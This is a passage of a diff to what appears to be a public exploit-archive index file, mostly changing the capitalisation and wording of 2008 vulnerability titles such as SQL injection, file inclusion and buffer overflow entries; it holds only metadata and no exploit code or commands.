Exploit",2008-01-30,Houssamix,php,webapps,0 -5013,platforms/php/webapps/5013.php,"WordPress Plugin Adserve 0.2 - adclick.php SQL Injection",2008-01-30,enter_the_dragon,php,webapps,0 +5013,platforms/php/webapps/5013.php,"Wordpress Plugin Adserve 0.2 - adclick.php SQL Injection",2008-01-30,enter_the_dragon,php,webapps,0 5014,platforms/php/webapps/5014.txt,"Mambo Component Recipes 1.00 - 'id' SQL Injection",2008-01-30,S@BUN,php,webapps,0 5015,platforms/php/webapps/5015.txt,"Mambo Component jokes 1.0 - (cat) SQL Injection",2008-01-30,S@BUN,php,webapps,0 5016,platforms/php/webapps/5016.txt,"Mambo Component EstateAgent 0.1 - SQL Injection",2008-01-30,S@BUN,php,webapps,0 -5017,platforms/php/webapps/5017.php,"WordPress Plugin WassUp 1.4.3 - (spy.php to_date) SQL Injection",2008-01-30,enter_the_dragon,php,webapps,0 +5017,platforms/php/webapps/5017.php,"Wordpress Plugin WassUp 1.4.3 - (spy.php to_date) SQL Injection",2008-01-30,enter_the_dragon,php,webapps,0 5018,platforms/php/webapps/5018.pl,"ibProArcade 3.3.0 - SQL Injection",2008-01-30,RST/GHC,php,webapps,0 5019,platforms/php/webapps/5019.txt,"Coppermine Photo Gallery 1.4.14 - Remote Command Execution Exploit",2008-01-30,waraxe,php,webapps,0 5020,platforms/php/webapps/5020.txt,"Joomla Component ChronoForms 2.3.5 - Remote File Inclusion",2008-01-30,Crackers_Child,php,webapps,0 @@ -4673,24 +4673,24 @@ id,file,description,date,author,platform,type,port 5032,platforms/windows/local/5032.c,"Total Video Player 1.03 - .M3U File Local Buffer Overflow",2008-02-01,"fl0 fl0w",windows,local,0 5033,platforms/php/webapps/5033.txt,"LightBlog 9.5 - cp_upload_image.php Remote File Upload",2008-02-01,Omni,php,webapps,0 5034,platforms/php/webapps/5034.txt,"Joomla Component NeoReferences 1.3.1 - 'catid' SQL Injection",2008-02-01,S@BUN,php,webapps,0 -5035,platforms/php/webapps/5035.txt,"WordPress Plugin dmsguestbook 1.7.0 - Multiple Vulnerabilities",2008-02-02,NBBN,php,webapps,0 +5035,platforms/php/webapps/5035.txt,"Wordpress Plugin dmsguestbook 1.7.0 - Multiple Vulnerabilities",2008-02-02,NBBN,php,webapps,0 5036,platforms/windows/dos/5036.pl,"Titan FTP Server 6.03 - (USER/PASS) Remote Heap Overflow PoC",2008-02-02,securfrog,windows,dos,0 5037,platforms/php/webapps/5037.txt,"The Everything Development System Pre-1.0 - SQL Injection",2008-02-02,sub,php,webapps,0 -5039,platforms/php/webapps/5039.txt,"WordPress Plugin Wordspew - SQL Injection",2008-02-02,S@BUN,php,webapps,0 +5039,platforms/php/webapps/5039.txt,"Wordpress Plugin Wordspew - SQL Injection",2008-02-02,S@BUN,php,webapps,0 5040,platforms/php/webapps/5040.txt,"BookmarkX script 2007 - (topicid) SQL Injection",2008-02-02,S@BUN,php,webapps,0 5041,platforms/php/webapps/5041.txt,"phpShop 0.8.1 - SQL Injection / Filter Bypass",2008-02-02,"the redc0ders",php,webapps,0 5042,platforms/php/webapps/5042.txt,"BlogPHP 2 - 'id' Cross-Site Scripting / SQL Injection",2008-02-02,"Khashayar Fereidani",php,webapps,0 5043,platforms/windows/dos/5043.html,"Yahoo! Music Jukebox 2.2 - AddImage() ActiveX Remote Buffer Overflow Exploit (PoC)",2008-02-02,h07,windows,dos,0 5044,platforms/windows/dos/5044.pl,"IpSwitch WS_FTP Server with SSH 6.1.0.0 - Remote Buffer Overflow PoC",2008-02-03,securfrog,windows,dos,0 5045,platforms/windows/remote/5045.html,"Sejoong Namo ActiveSquare 6 - NamoInstaller.dll ActiveX Buffer Overflow Exploit",2008-02-03,plan-s,windows,remote,0 -5046,platforms/windows/remote/5046.php,"Yahoo! Music Jukebox 2.2 - AddImage() ActiveX Remote Buffer Overflow Exploit",2008-02-03,anonymous,windows,remote,0 +5046,platforms/windows/remote/5046.php,"Yahoo! Music Jukebox 2.2 - AddImage() ActiveX Remote Buffer Overflow Exploit (1)",2008-02-03,anonymous,windows,remote,0 5047,platforms/php/webapps/5047.txt,"Joomla Component mosDirectory 2.3.2 - 'catid' SQL Injection",2008-02-03,GoLd_M,php,webapps,0 5048,platforms/windows/remote/5048.html,"Yahoo! Music Jukebox 2.2 - AddImage() ActiveX Remote Buffer Overflow Exploit (2)",2008-02-03,exceed,windows,remote,0 5049,platforms/windows/remote/5049.html,"FaceBook PhotoUploader - (ImageUploader4.ocx 4.5.57.0) Buffer Overflow Exploit",2008-02-03,Elazar,windows,remote,0 5050,platforms/php/webapps/5050.pl,"A-Blog 2.0 - 'id' Cross-Site Scripting / SQL Injection",2008-02-03,"Khashayar Fereidani",php,webapps,0 -5051,platforms/windows/remote/5051.html,"Yahoo! Music Jukebox 2.2 - AddButton() ActiveX Remote Buffer Overflow Exploit (3)",2008-02-03,Elazar,windows,remote,0 +5051,platforms/windows/remote/5051.html,"Yahoo! Music JukeBox 2.2 - AddButton() ActiveX Remote Buffer Overflow Exploit",2008-02-03,Elazar,windows,remote,0 5052,platforms/windows/remote/5052.html,"Yahoo! JukeBox MediaGrid - ActiveX mediagrid.dll AddBitmap() Buffer Overflow Exploit",2008-02-03,Elazar,windows,remote,0 -5053,platforms/php/webapps/5053.txt,"WordPress Plugin st_newsletter - SQL Injection",2008-02-03,S@BUN,php,webapps,0 +5053,platforms/php/webapps/5053.txt,"Wordpress Plugin st_newsletter - SQL Injection",2008-02-03,S@BUN,php,webapps,0 5054,platforms/hardware/dos/5054.c,"MicroTik RouterOS 3.2 - SNMPd snmp-set Denial of Service",2008-02-03,ShadOS,hardware,dos,0 5055,platforms/php/webapps/5055.txt,"Joomla Component Marketplace 1.1.1 - SQL Injection",2008-02-03,"SoSo H H",php,webapps,0 5056,platforms/php/webapps/5056.txt,"ITechBids 5.0 - (bidhistory.php item_id) SQL Injection",2008-02-04,QTRinux,php,webapps,0 @@ -4703,7 +4703,7 @@ id,file,description,date,author,platform,type,port 5063,platforms/windows/dos/5063.pl,"NERO Media Player 1.4.0.35b - .M3U File Buffer Overflow PoC",2008-02-05,securfrog,windows,dos,0 5064,platforms/php/webapps/5064.txt,"All Club CMS 0.0.2 - 'index.php' SQL Injection",2008-02-05,ka0x,php,webapps,0 5065,platforms/php/webapps/5065.txt,"Photokorn Gallery 1.543 - (pic) SQL Injection",2008-02-05,you_kn0w,php,webapps,0 -5066,platforms/php/webapps/5066.php,"WordPress MU < 1.3.2 - active_plugins option Code Execution Exploit",2008-02-05,"Alexander Concha",php,webapps,0 +5066,platforms/php/webapps/5066.php,"Wordpress MU < 1.3.2 - active_plugins option Code Execution Exploit",2008-02-05,"Alexander Concha",php,webapps,0 5067,platforms/windows/dos/5067.pl,"dBpowerAMP Audio Player Release 2 - M3U File Buffer Overflow PoC",2008-02-05,securfrog,windows,dos,0 5068,platforms/php/webapps/5068.txt,"OpenSiteAdmin 0.9.1.1 - Multiple File Inclusion",2008-02-06,Trancek,php,webapps,0 5069,platforms/windows/remote/5069.pl,"dBpowerAMP Audio Player Release 2 - M3U File Buffer Overflow",2008-02-06,securfrog,windows,remote,0 @@ -4716,7 +4716,7 @@ id,file,description,date,author,platform,type,port 5076,platforms/php/webapps/5076.txt,"Mambo Component Sermon 0.2 - (gid) SQL Injection",2008-02-07,S@BUN,php,webapps,0 5077,platforms/windows/local/5077.cpp,"Total Video Player 1.20 - .M3U File Local Stack Buffer Overflow",2008-02-07,"fl0 fl0w",windows,local,0 5078,platforms/windows/remote/5078.htm,"Backup Exec System Recovery Manager 7.0.1 - File Upload Exploit",2008-02-07,titon,windows,remote,0 -5079,platforms/windows/remote/5079.c,"SapLPD 6.28 - Remote Buffer Overflow (Win32)",2008-02-07,BackBone,windows,remote,515 +5079,platforms/windows/remote/5079.c,"SapLPD 6.28 (Windows/x86) - Remote Buffer Overflow",2008-02-07,BackBone,windows,remote,515 5080,platforms/php/webapps/5080.txt,"Joomla Component com_doc - SQL Injection",2008-02-07,S@BUN,php,webapps,0 5081,platforms/php/webapps/5081.txt,"Joomla Component com_noticias 1.0 - SQL Injection",2008-02-07,xcorpitx,php,webapps,0 5082,platforms/php/webapps/5082.txt,"PowerNews (Newsscript) 2.5.6 - Local File Inclusion",2008-02-08,DSecRG,php,webapps,0 @@ -4745,13 +4745,13 @@ id,file,description,date,author,platform,type,port 5105,platforms/php/webapps/5105.pl,"AuraCMS 2.2 - (gallery_data.php) SQL Injection",2008-02-12,DNX,php,webapps,0 5106,platforms/windows/remote/5106.html,"Citrix Presentation Server Client - WFICA.OCX ActiveX Heap Buffer Overflow Exploit",2008-02-12,Elazar,windows,remote,0 5107,platforms/windows/local/5107.c,"Microsoft Office 2003 - (.wps) Stack Overflow (MS08-011)",2008-02-13,chujwamwdupe,windows,local,0 -5108,platforms/php/webapps/5108.txt,"Affiliate Market 0.1 BETA - (language) Local File Inclusion",2008-02-13,GoLd_M,php,webapps,0 +5108,platforms/php/webapps/5108.txt,"Affiliate Market 0.1 Beta - (language) Local File Inclusion",2008-02-13,GoLd_M,php,webapps,0 5109,platforms/php/webapps/5109.txt,"Joomla Component xfaq 1.2 - (aid) SQL Injection",2008-02-13,S@BUN,php,webapps,0 5110,platforms/windows/dos/5110.txt,"QuickTime 7.4.1 - QTPlugin.ocx Multiple Stack Overflow Vulnerabilities",2008-02-13,"laurent gaffié ",windows,dos,0 5111,platforms/windows/remote/5111.html,"IBM Domino Web Access Upload Module - SEH Overwrite",2008-02-13,Elazar,windows,remote,0 5112,platforms/jsp/webapps/5112.txt,"jspwiki 2.4.104 / 2.5.139 - Multiple Vulnerabilities",2008-02-13,"BugSec LTD",jsp,webapps,0 5113,platforms/hardware/remote/5113.txt,"Philips VOIP841 - (Firmware 1.0.4.800) Multiple Vulnerabilities",2008-02-14,ikki,hardware,remote,0 -5114,platforms/php/webapps/5114.pl,"Affiliate Market 0.1 BETA - Cross-Site Scripting / SQL Injection",2008-02-14,"Khashayar Fereidani",php,webapps,0 +5114,platforms/php/webapps/5114.pl,"Affiliate Market 0.1 Beta - Cross-Site Scripting / SQL Injection",2008-02-14,"Khashayar Fereidani",php,webapps,0 5115,platforms/php/webapps/5115.txt,"nuBoard 0.5 - (threads.php ssid) SQL Injection",2008-02-14,"Khashayar Fereidani",php,webapps,0 5116,platforms/php/webapps/5116.txt,"artmedic weblog 1.0 - Multiple Local File Inclusion",2008-02-14,muuratsalo,php,webapps,0 5117,platforms/php/webapps/5117.txt,"Joomla Component paxxgallery 0.2 - (iid) SQL Injection",2008-02-14,S@BUN,php,webapps,0 @@ -4763,8 +4763,8 @@ id,file,description,date,author,platform,type,port 5123,platforms/php/webapps/5123.txt,"Scribe 0.2 - 'index.php' Local File Inclusion",2008-02-14,muuratsalo,php,webapps,0 5124,platforms/php/webapps/5124.txt,"freePHPgallery 0.6 - Cookie Local File Inclusion",2008-02-14,MhZ91,php,webapps,0 5125,platforms/php/webapps/5125.txt,"PHP Live! 3.2.2 - (questid) SQL Injection (1)",2008-02-14,Xar,php,webapps,0 -5126,platforms/php/webapps/5126.txt,"WordPress Plugin Simple Forum 2.0-2.1 - SQL Injection",2008-02-15,S@BUN,php,webapps,0 -5127,platforms/php/webapps/5127.txt,"WordPress Plugin Simple Forum 1.10-1.11 - SQL Injection",2008-02-15,S@BUN,php,webapps,0 +5126,platforms/php/webapps/5126.txt,"Wordpress Plugin Simple Forum 2.0-2.1 - SQL Injection",2008-02-15,S@BUN,php,webapps,0 +5127,platforms/php/webapps/5127.txt,"Wordpress Plugin Simple Forum 1.10-1.11 - SQL Injection",2008-02-15,S@BUN,php,webapps,0 5128,platforms/php/webapps/5128.txt,"Mambo Component Quran 1.1 - (surano) SQL Injection",2008-02-15,Don,php,webapps,0 5129,platforms/php/webapps/5129.txt,"TRUC 0.11.0 - 'download.php' Remote File Disclosure",2008-02-16,GoLd_M,php,webapps,0 5130,platforms/php/webapps/5130.txt,"AuraCMS 1.62 - Multiple SQL Injections",2008-02-16,NTOS-Team,php,webapps,0 @@ -4772,7 +4772,7 @@ id,file,description,date,author,platform,type,port 5132,platforms/php/webapps/5132.txt,"Joomla Component jooget 2.6.8 - SQL Injection",2008-02-16,S@BUN,php,webapps,0 5133,platforms/php/webapps/5133.txt,"Mambo Component Ricette 1.0 - SQL Injection",2008-02-16,S@BUN,php,webapps,0 5134,platforms/php/webapps/5134.txt,"Joomla Component com_galeria - SQL Injection",2008-02-16,S@BUN,php,webapps,0 -5135,platforms/php/webapps/5135.txt,"WordPress Photo album Remote - SQL Injection",2008-02-16,S@BUN,php,webapps,0 +5135,platforms/php/webapps/5135.txt,"Wordpress Photo album Remote - SQL Injection",2008-02-16,S@BUN,php,webapps,0 5136,platforms/php/webapps/5136.txt,"PHPizabi 0.848b C1 HFP1 - Remote File Upload",2008-02-17,ZoRLu,php,webapps,0 5137,platforms/php/webapps/5137.txt,"XPWeb 3.3.2 - (Download.php url) Remote File Disclosure",2008-02-17,GoLd_M,php,webapps,0 5138,platforms/php/webapps/5138.txt,"Joomla Component astatsPRO 1.0 - refer.php SQL Injection",2008-02-18,ka0x,php,webapps,0 @@ -4812,32 +4812,32 @@ id,file,description,date,author,platform,type,port 5172,platforms/php/webapps/5172.txt,"PHP-Nuke Module NukeC 2.1 - (id_catg) SQL Injection",2008-02-21,DamaR,php,webapps,0 5173,platforms/php/webapps/5173.txt,"phpQLAdmin 2.2.7 - Multiple Remote File Inclusion",2008-02-22,RoMaNcYxHaCkEr,php,webapps,0 5174,platforms/php/webapps/5174.txt,"Quantum Game Library 0.7.2c - Remote File Inclusion",2008-02-22,RoMaNcYxHaCkEr,php,webapps,0 -5175,platforms/php/webapps/5175.txt,"phpProfiles 4.5.2 BETA - (body_comm.inc.php) Remote File Inclusion",2008-02-23,CraCkEr,php,webapps,0 +5175,platforms/php/webapps/5175.txt,"phpProfiles 4.5.2 Beta - (body_comm.inc.php) Remote File Inclusion",2008-02-23,CraCkEr,php,webapps,0 5176,platforms/php/webapps/5176.txt,"Quinsonnas Mail Checker 1.55 - (footer.php) Remote File Inclusion",2008-02-23,GoLd_M,php,webapps,0 5177,platforms/php/webapps/5177.txt,"Joomla Component simple shop 2.0 - SQL Injection",2008-02-23,S@BUN,php,webapps,0 5178,platforms/php/webapps/5178.txt,"Mambo Component garyscookbook 1.1.1 - SQL Injection",2008-02-23,S@BUN,php,webapps,0 5179,platforms/php/webapps/5179.txt,"phpUserBase 1.3b - (unverified.inc.php) Local File Inclusion",2008-02-23,BeyazKurt,php,webapps,0 5180,platforms/php/webapps/5180.txt,"phpUserBase 1.3b - (unverified.inc.php) Remote File Inclusion",2008-02-24,CraCkEr,php,webapps,0 -5181,platforms/php/webapps/5181.txt,"pigyard art gallery - Multiple Vulnerabilities",2008-02-24,ZoRLu,php,webapps,0 +5181,platforms/php/webapps/5181.txt,"pigyard art Gallery - Multiple Vulnerabilities",2008-02-24,ZoRLu,php,webapps,0 5182,platforms/php/webapps/5182.txt,"Portail Web Php 2.5.1.1 - Multiple Inclusion Vulnerabilities",2008-02-24,GoLd_M,php,webapps,0 5183,platforms/php/webapps/5183.txt,"php Download Manager 1.1 - Local File Inclusion",2008-02-24,BeyazKurt,php,webapps,0 5184,platforms/windows/dos/5184.py,"MyServer 0.8.11 - (204 No Content) error Remote Denial of Service",2008-02-25,shinnai,windows,dos,0 -5185,platforms/asp/webapps/5185.txt,"PORAR WEBBOARD - (question.asp) SQL Injection",2008-02-25,xcorpitx,asp,webapps,0 +5185,platforms/asp/webapps/5185.txt,"PORAR WebBoard - (question.asp) SQL Injection",2008-02-25,xcorpitx,asp,webapps,0 5186,platforms/php/webapps/5186.txt,"PHP-Nuke Module Kose_Yazilari - (artid) SQL Injection",2008-02-25,xcorpitx,php,webapps,0 5187,platforms/asp/webapps/5187.txt,"MiniNuke 2.1 - (members.asp uid) SQL Injection",2008-02-25,S@BUN,asp,webapps,0 5188,platforms/windows/remote/5188.html,"Rising Antivirus Online Scanner - Insecure Method Flaw Exploit",2008-02-25,"John Smith",windows,remote,0 5189,platforms/php/webapps/5189.pl,"DBHcms 1.1.4 - Remote File Inclusion Exploit",2008-02-25,Iron,php,webapps,0 5190,platforms/windows/remote/5190.html,"Move Networks Quantum Streaming Player Control - Buffer Overflow Exploit",2008-02-26,Elazar,windows,remote,0 -5191,platforms/multiple/dos/5191.c,"Apple Mac OS X xnu 1228.3.13 - IPv6-ipcomp Remote kernel Denial of Service PoC",2008-02-26,mu-b,multiple,dos,0 +5191,platforms/multiple/dos/5191.c,"Apple Mac OSX xnu 1228.3.13 - IPv6-ipcomp Remote kernel Denial of Service PoC",2008-02-26,mu-b,multiple,dos,0 5192,platforms/php/webapps/5192.pl,"Nukedit 4.9.x - Remote Create Admin Exploit",2008-02-26,r3dm0v3,php,webapps,0 5193,platforms/windows/remote/5193.html,"D-Link MPEG4 SHM Audio Control - (VAPGDecoder.dll 1.7.0.5) Buffer Overflow Exploit",2008-02-26,rgod,windows,remote,0 -5194,platforms/php/webapps/5194.txt,"WordPress Plugin Sniplets 1.1.2 - (Remote File Inclusion / Cross-Site Scripting / Remote Code Execution) Multiple Vulnerabilities",2008-02-26,NBBN,php,webapps,0 +5194,platforms/php/webapps/5194.txt,"Wordpress Plugin Sniplets 1.1.2 - (Remote File Inclusion / Cross-Site Scripting / Remote Code Execution) Multiple Vulnerabilities",2008-02-26,NBBN,php,webapps,0 5195,platforms/php/webapps/5195.txt,"Mambo Component Simpleboard 1.0.3 - 'catid' SQL Injection",2008-02-27,"it's my",php,webapps,0 5196,platforms/php/webapps/5196.pl,"EazyPortal 1.0 - (COOKIE) SQL Injection",2008-02-27,Iron,php,webapps,0 5197,platforms/php/webapps/5197.txt,"GROUP-E 1.6.41 - (head_auth.php) Remote File Inclusion",2008-02-27,CraCkEr,php,webapps,0 5198,platforms/php/webapps/5198.txt,"Koobi Pro 5.7 - (categ) SQL Injection",2008-02-28,Cr@zy_King,php,webapps,0 5199,platforms/php/webapps/5199.txt,"SiteBuilderElite 1.2 - Multiple Remote File Inclusion",2008-02-28,MhZ91,php,webapps,0 -5200,platforms/php/webapps/5200.txt,"Podcast Generator 1.0 BETA 2 - Remote File Inclusion / File Disclosure",2008-02-28,GoLd_M,php,webapps,0 +5200,platforms/php/webapps/5200.txt,"Podcast Generator 1.0 Beta 2 - Remote File Inclusion / File Disclosure",2008-02-28,GoLd_M,php,webapps,0 5201,platforms/windows/dos/5201.txt,"Crysis 1.1.1.5879 - Remote Format String Denial of Service PoC",2008-02-28,"Long Poke",windows,dos,0 5202,platforms/php/webapps/5202.txt,"barryvan compo manager 0.5pre-1 - Remote File Inclusion",2008-02-28,MhZ91,php,webapps,0 5203,platforms/php/webapps/5203.txt,"PHP-Nuke My_eGallery 2.7.9 - SQL Injection",2008-02-28,"Aria-Security Team",php,webapps,0 @@ -4848,8 +4848,8 @@ id,file,description,date,author,platform,type,port 5208,platforms/php/webapps/5208.txt,"phpArcadeScript 3.0RC2 - (userid) SQL Injection",2008-03-01,"SoSo H H",php,webapps,0 5209,platforms/php/webapps/5209.txt,"phpComasy 0.8 - (mod_project_id) SQL Injection",2008-03-01,Cr@zy_King,php,webapps,0 5210,platforms/linux/dos/5210.c,"Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) Denial of Service",2008-03-01,0in,linux,dos,0 -5211,platforms/php/webapps/5211.txt,"Dynamic photo gallery 1.02 - (albumID) SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0 -5212,platforms/windows/remote/5212.py,"MiniWebSvr 0.0.9a - Remote Directory Transversal",2008-03-03,gbr,windows,remote,0 +5211,platforms/php/webapps/5211.txt,"Dynamic photo Gallery 1.02 - (albumID) SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0 +5212,platforms/windows/remote/5212.py,"MiniWebsvr 0.0.9a - Remote Directory Transversal",2008-03-03,gbr,windows,remote,0 5213,platforms/windows/remote/5213.txt,"Versant Object Database 7.0.1.3 - Commands Execution Exploit",2008-03-04,"Luigi Auriemma",windows,remote,0 5214,platforms/php/webapps/5214.txt,"Mitra Informatika Solusindo cart - SQL Injection",2008-03-04,bius,php,webapps,0 5215,platforms/multiple/remote/5215.txt,"Ruby 1.8.6 - (Webrick Httpd 1.3.1) Directory Traversal",2008-03-06,DSecRG,multiple,remote,0 @@ -4904,7 +4904,7 @@ id,file,description,date,author,platform,type,port 5265,platforms/php/webapps/5265.txt,"Exero CMS 1.0.1 - (theme) Multiple Local File Inclusion",2008-03-17,GoLd_M,php,webapps,0 5266,platforms/php/webapps/5266.txt,"PHPauction GPL Enhanced 2.51 - Multiple Remote File Inclusion",2008-03-17,RoMaNcYxHaCkEr,php,webapps,0 5267,platforms/php/webapps/5267.txt,"XOOPS Module Dictionary 0.94 - SQL Injection",2008-03-17,S@BUN,php,webapps,0 -5268,platforms/multiple/dos/5268.html,"Apple Safari (webkit) - Remote Denial of Service (iPhone/OSX/Windows)",2008-03-17,"Georgi Guninski",multiple,dos,0 +5268,platforms/multiple/dos/5268.html,"Apple Safari (webkit) (iPhone/OSX/Windows) - Remote Denial of Service",2008-03-17,"Georgi Guninski",multiple,dos,0 5269,platforms/windows/remote/5269.txt,"mg-soft net inspector 6.5.0.828 - Multiple Vulnerabilities",2008-03-17,"Luigi Auriemma",windows,remote,0 5270,platforms/windows/dos/5270.pl,"Home FTP Server 1.4.5 - Remote Denial of Service",2008-03-17,0in,windows,dos,0 5273,platforms/php/webapps/5273.txt,"Joomla Component Acajoom (com_acajoom) - SQL Injection",2008-03-18,fataku,php,webapps,0 @@ -4922,7 +4922,7 @@ id,file,description,date,author,platform,type,port 5286,platforms/php/webapps/5286.txt,"ASPapp Knowledge Base - SQL Injection",2008-03-20,xcorpitx,php,webapps,0 5287,platforms/windows/local/5287.txt,"Microsoft Excel - Code Execution Exploit (MS08-014)",2008-03-21,zha0,windows,local,0 5288,platforms/php/webapps/5288.txt,"phpAddressBook 2.11 - Multiple Local File Inclusion",2008-03-21,0x90,php,webapps,0 -5289,platforms/hardware/remote/5289.txt,"ZyXEL ZyWALL Quagga/Zebra - (default pass) Remote Root",2008-03-21,"Pranav Joshi",hardware,remote,0 +5289,platforms/hardware/remote/5289.txt,"ZYXEL ZyWALL Quagga/Zebra - (default pass) Remote Root",2008-03-21,"Pranav Joshi",hardware,remote,0 5290,platforms/php/webapps/5290.txt,"RunCMS Module Photo 3.02 - 'cid' SQL Injection",2008-03-21,S@BUN,php,webapps,0 5291,platforms/php/webapps/5291.txt,"D.E. Classifieds - 'cat_id' SQL Injection",2008-03-21,S@BUN,php,webapps,0 5292,platforms/php/webapps/5292.py,"PostNuke 0.764 - Blind SQL Injection",2008-03-21,The:Paradox,php,webapps,0 @@ -4959,11 +4959,11 @@ id,file,description,date,author,platform,type,port 5323,platforms/php/webapps/5323.pl,"mxBB Module mx_blogs 2.0.0-beta - Remote File Inclusion Exploit",2008-03-30,bd0rk,php,webapps,0 5324,platforms/php/webapps/5324.txt,"KISGB (tmp_theme) 5.1.1 - Local File Inclusion",2008-03-30,Cr@zy_King,php,webapps,0 5325,platforms/php/webapps/5325.txt,"JShop 1.x - 2.x (page.php xPage) Local File Inclusion",2008-03-30,v0l4arrra,php,webapps,0 -5326,platforms/php/webapps/5326.txt,"WordPress Plugin Download - (dl_id) SQL Injection",2008-03-31,BL4CK,php,webapps,0 +5326,platforms/php/webapps/5326.txt,"Wordpress Plugin Download - (dl_id) SQL Injection",2008-03-31,BL4CK,php,webapps,0 5327,platforms/windows/dos/5327.txt,"Microsoft Windows - Explorer Unspecified .DOC File Denial of Service",2008-03-31,"Iron Team",windows,dos,0 5328,platforms/php/webapps/5328.txt,"phpSpamManager 0.53b - (body.php) Remote File Disclosure",2008-03-31,GoLd_M,php,webapps,0 5329,platforms/php/webapps/5329.txt,"Woltlab Burning Board Addon JGS-Treffen - SQL Injection",2008-03-31,anonymous,php,webapps,0 -5330,platforms/windows/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow (Win32)",2008-03-31,Heretic2,windows,remote,80 +5330,platforms/windows/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 (Windows/x86) - Remote Buffer Overflow",2008-03-31,Heretic2,windows,remote,80 5331,platforms/php/webapps/5331.pl,"Neat weblog 0.2 - (articleId) SQL Injection",2008-03-31,"Khashayar Fereidani",php,webapps,0 5332,platforms/windows/remote/5332.html,"Real Player - rmoc3260.dll ActiveX Control Remote Code Execution Exploit",2008-04-01,Elazar,windows,remote,0 5333,platforms/php/webapps/5333.txt,"EasyNews 40tr - (SQL Injection / Cross-Site Scripting / Local File Inclusion) SQL Injection",2008-04-01,"Khashayar Fereidani",php,webapps,0 @@ -5118,7 +5118,7 @@ id,file,description,date,author,platform,type,port 5483,platforms/php/webapps/5483.txt,"TR News 2.1 - (nb) SQL Injection",2008-04-21,His0k4,php,webapps,0 5484,platforms/php/webapps/5484.txt,"Joomla Component FlippingBook 1.0.4 - SQL Injection",2008-04-22,cO2,php,webapps,0 5485,platforms/php/webapps/5485.pl,"Web Calendar 4.1 - Blind SQL Injection",2008-04-22,t0pP8uZz,php,webapps,0 -5486,platforms/php/webapps/5486.txt,"WordPress Plugin Spreadsheet 0.6 - SQL Injection",2008-04-22,1ten0.0net1,php,webapps,0 +5486,platforms/php/webapps/5486.txt,"Wordpress Plugin Spreadsheet 0.6 - SQL Injection",2008-04-22,1ten0.0net1,php,webapps,0 5487,platforms/php/webapps/5487.txt,"E RESERV 2.1 - (index.php ID_loc) SQL Injection",2008-04-23,JIKO,php,webapps,0 5488,platforms/php/webapps/5488.txt,"Joomla Component Filiale 1.0.4 - (idFiliale) SQL Injection",2008-04-23,str0xo,php,webapps,0 5489,platforms/windows/remote/5489.html,"Zune Software - ActiveX Arbitrary File Overwrite",2008-04-23,"ilion security",windows,remote,0 @@ -5136,7 +5136,7 @@ id,file,description,date,author,platform,type,port 5501,platforms/php/webapps/5501.txt,"Content Management System for Phprojekt 0.6.1 - Remote File Inclusion",2008-04-26,RoMaNcYxHaCkEr,php,webapps,0 5502,platforms/php/webapps/5502.pl,"Clever Copy 3.0 - (postview.php) SQL Injection",2008-04-26,U238,php,webapps,0 5503,platforms/asp/webapps/5503.txt,"Angelo-Emlak 1.0 - Multiple SQL Injections",2008-04-26,U238,asp,webapps,0 -5504,platforms/php/webapps/5504.txt,"PHP Forge 3 beta 2 - 'id' SQL Injection",2008-04-26,JIKO,php,webapps,0 +5504,platforms/php/webapps/5504.txt,"PHP Forge 3 Beta 2 - 'id' SQL Injection",2008-04-26,JIKO,php,webapps,0 5505,platforms/php/webapps/5505.txt,"RunCMS Module MyArticles 0.6 Beta-1 - SQL Injection",2008-04-26,Cr@zy_King,php,webapps,0 5506,platforms/php/webapps/5506.txt,"PHPizabi 0.848b C1 HFP3 - Database Information Disclosure",2008-04-26,YOUCODE,php,webapps,0 5507,platforms/asp/webapps/5507.txt,"megabbs forum 2.2 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-04-27,BugReport.IR,asp,webapps,0 @@ -5192,12 +5192,12 @@ id,file,description,date,author,platform,type,port 5557,platforms/php/webapps/5557.pl,"OneCMS 2.5 - Blind SQL Injection",2008-05-07,Cod3rZ,php,webapps,0 5558,platforms/php/webapps/5558.txt,"CMS Faethon 2.2 Ultimate - (Remote File Inclusion / Cross-Site Scripting) Multiple Remote Vulnerabilities",2008-05-07,RoMaNcYxHaCkEr,php,webapps,0 5559,platforms/php/webapps/5559.txt,"ezContents CMS 2.0.0 - Multiple SQL Injections",2008-05-07,"Virangar Security",php,webapps,0 -5560,platforms/php/webapps/5560.txt,"Musicbox 2.3.7 - (artistId) SQL Injection",2008-05-07,HaCkeR_EgY,php,webapps,0 +5560,platforms/php/webapps/5560.txt,"MusicBox 2.3.7 - (artistId) SQL Injection",2008-05-07,HaCkeR_EgY,php,webapps,0 5561,platforms/linux/dos/5561.pl,"rdesktop 1.5.0 - iso_recv_msg() Integer Underflow PoC",2008-05-08,"Guido Landi",linux,dos,0 5562,platforms/php/webapps/5562.py,"RunCMS 1.6.1 - (msg_image) SQL Injection",2008-05-08,The:Paradox,php,webapps,0 5563,platforms/windows/remote/5563.pl,"TFTP Server for Windows 1.4 - ST Remote BSS Overflow",2008-05-08,tixxDZ,windows,remote,69 5564,platforms/asp/webapps/5564.txt,"Shader TV (Beta) - Multiple SQL Injections",2008-05-08,U238,asp,webapps,0 -5565,platforms/php/webapps/5565.pl,"vShare Youtube Clone 2.6 - (tid) SQL Injection",2008-05-08,Saime,php,webapps,0 +5565,platforms/php/webapps/5565.pl,"vShare YouTube Clone 2.6 - (tid) SQL Injection",2008-05-08,Saime,php,webapps,0 5566,platforms/php/webapps/5566.txt,"SazCart 1.5.1 - Multiple Remote File Inclusion",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0 5567,platforms/php/webapps/5567.txt,"Cyberfolio 7.12 - (rep) Remote File Inclusion",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0 5568,platforms/php/webapps/5568.txt,"miniBloggie 1.0 - (del.php) Arbitrary Delete Post",2008-05-08,Cod3rZ,php,webapps,0 @@ -5263,7 +5263,7 @@ id,file,description,date,author,platform,type,port 5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 - (post_id) SQL Injection",2008-05-16,Stack,php,webapps,0 5636,platforms/php/webapps/5636.txt,"Zomplog 3.8.2 - (force_download.php) File Disclosure",2008-05-16,Stack,php,webapps,0 5637,platforms/php/webapps/5637.txt,"WR-Meeting 1.0 - (msnum) Local File Disclosure",2008-05-17,Cr@zy_King,php,webapps,0 -5638,platforms/php/webapps/5638.txt,"How2ASP.net Webboard 4.1 - SQL 